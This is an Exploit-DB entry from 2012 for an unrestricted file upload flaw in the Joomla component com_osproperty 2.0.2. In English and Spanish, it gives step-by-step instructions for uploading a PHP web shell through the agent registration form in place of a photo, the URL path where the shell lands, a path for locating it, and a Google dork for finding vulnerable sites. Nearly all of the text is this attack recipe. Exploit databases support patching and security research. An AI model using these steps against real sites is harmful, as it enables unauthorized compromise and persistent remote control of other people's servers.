Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload

EDB-ID:

19829

CVE:

EDB Verified:

Author:

D4NB4R

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2012-07-14

Vulnerable App:

_______________________________________________________________________________________
 
 Exploit Title: Joomla com_osproperty Unrestricted File Upload 

 Google Dork: com_osproperty

 Date: [13-07-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 site: http://www.insecurityperu.org/  &  http://poisonsecurity.wordpress.com/

 Vendor: Ossolution Team http://extensions.joomla.org/

 Version: 2.0.2 (last update on Jul 12, 2012)

 License: Commercial $ 28.86us
 
 Tested on: [Linux(arch)-Windows(7ultimate)]


1.  Go to this route
    Ingrese a esta ruta
   
   http://site/component/osproperty/?task=agent_register


2.  Complete the form, raising the shell.php instead of your photo
    Complete el formulario, subiendo la shell.php en lugar de su foto


3.  Locate your file in the root /osproperty/agent/ 
    Busque su archivo en la raiz /osproperty/agent/ 
 
    http://site/images/osproperty/agent/randomid_yourshell.php


Help:  This path can help you find your web shell in case you need it
       Este path le puede ayudar a encontrar su web shell en caso q lo necesite
      
           component/osproperty/?task=agent_default
 

Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"  2012

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services